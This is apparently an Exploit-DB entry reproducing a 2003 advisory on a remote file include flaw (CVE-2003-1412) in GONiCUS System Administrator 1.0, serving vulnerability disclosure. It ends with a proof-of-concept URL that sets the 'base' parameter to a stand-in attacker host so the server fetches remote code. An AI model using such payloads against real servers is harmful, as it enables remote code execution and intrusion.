GONiCUS System Administrator 1.0 - Remote File Include Vulnerability

2003-02-24T00:00:00
ID EDB-ID:22279
Type exploitdb
Reporter Karol Wiesek
Modified 2003-02-24T00:00:00

Description

GONiCUS System Administrator 1.0 Remote File Include Vulnerability. CVE-2003-1412. Shellcode exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/6922/info

GONiCUS System Administrator is prone to an issue that may allow remote attackers to include files located on remote servers. This issue is present in several PHP pages existing in the /plugins and /includes folders.

By crafting specific URI parameters it is possible for an attacker to influence the include path for these scripts to an external file on an attacker-controlled host. If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the vulnerable web server.

This vulnerability has been reported for GONiCUS System Administrator Version 1, previous versions may also be affected.

http://www.example.org/include/help.php?base=http://www.attacker.org/